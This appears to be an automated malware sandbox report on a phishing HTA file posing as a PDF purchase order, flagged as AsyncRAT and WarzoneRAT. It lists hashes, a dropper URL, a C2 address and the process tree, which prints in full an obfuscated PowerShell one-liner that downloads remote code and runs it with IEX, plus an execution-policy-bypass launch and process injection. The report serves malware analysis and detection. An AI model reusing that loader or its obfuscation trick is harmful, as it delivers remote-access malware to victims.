Overview

overview

10

Static

static

PO List 03...df.hta

windows7_x64

10

PO List 03...df.hta

windows10_x64

10

Analysis

  • max time kernel
    1791s
  • max time network
    1814s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    07-06-2021 18:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO List 030621.pdf.hta

  • Size

    1KB

  • MD5

    c69d7a4fcee29976c69a25ad6a25f627

  • SHA1

    a44c31bce10346f44a6907b3a3092de8bc2b7c24

  • SHA256

    2be3fbee47d3308141e55e0c06bf9e3ae7999ec67572c6038dea38ecd25ca876

  • SHA512

    a4a3c86f43e8f8effe4fa333ec542e919f62b8da1dee21f542b4b857990c112e6296f58e9051fed1d251ffb6852eac45e424481304bb42d6cac46e46b6a29f16

Score
10/10
asyncratwarzoneratinfostealerrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601500.us.archive.org/3/items/all-2_202106/ALL2.TXT

Extracted

Family

warzonerat

C2

5.206.224.194:3080

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Async RAT payload 1 IoCs
    rat
  • Warzone RAT Payload 3 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\PO List 030621.pdf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia601500.us.archive.org/3/items/all-2_202106/ALL2.TXT';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3848
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
            PID:2176
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
              PID:1056
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
                PID:3784
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                4⤵
                  PID:1952
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  4⤵
                    PID:2008

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              MD5

              c2d06c11dd1f1a8b1dedc1a311ca8cdc

              SHA1

              75c07243f9cb80a9c7aed2865f9c5192cc920e7e

              SHA256

              91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

              SHA512

              db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

              Download Submit

            • C:\Users\Public\ Microsoft.ps1
              MD5

              202491949283ca454f7a5ad9467d2c35

              SHA1

              ab57577bf573f33d61f279dcddbff424a2c4ba29

              SHA256

              070f3d73cf4c3b2c0cfbf7f1e3e8f7f659a61fafed1dcf75691b402e34f539e1

              SHA512

              9aac65a71ccc895b86ba115c3c899dbc7f88d153b925f03da72af10bb2dda3d014c15c9f5f333a6f18a13e5cf5f1334e95033b856c83aa19024ca5c4028cb4cc

              Download Submit

            • memory/2008-192-0x0000000003050000-0x0000000003051000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2008-190-0x000000000040C6EE-mapping.dmp

              Download

            • memory/2140-134-0x0000000007083000-0x0000000007084000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-141-0x000000000AA20000-0x000000000AA21000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-122-0x0000000008050000-0x0000000008051000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-123-0x00000000083C0000-0x00000000083C1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-125-0x0000000007082000-0x0000000007083000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-124-0x0000000007080000-0x0000000007081000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-126-0x0000000008510000-0x0000000008511000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-127-0x0000000008810000-0x0000000008811000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-132-0x0000000009EA0000-0x0000000009EA1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-133-0x0000000009510000-0x0000000009511000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-114-0x0000000000000000-mapping.dmp

              Download

            • memory/2140-139-0x0000000009B70000-0x0000000009B71000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-140-0x0000000007360000-0x0000000007361000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-121-0x0000000007E00000-0x0000000007E01000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-117-0x0000000007010000-0x0000000007011000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-118-0x00000000076C0000-0x00000000076C1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-119-0x0000000007D60000-0x0000000007D61000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2140-120-0x0000000007FE0000-0x0000000007FE1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3784-187-0x0000000000405738-mapping.dmp

              Download

            • memory/3784-189-0x0000000000400000-0x000000000041D000-memory.dmp

              Filesize

              116KB

              Download

            • memory/3848-171-0x0000000008C70000-0x0000000008C71000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3848-160-0x0000000004F72000-0x0000000004F73000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3848-188-0x0000000009A90000-0x0000000009A91000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3848-159-0x0000000004F70000-0x0000000004F71000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3848-191-0x0000000007600000-0x0000000007C28000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/3848-150-0x0000000000000000-mapping.dmp

              Download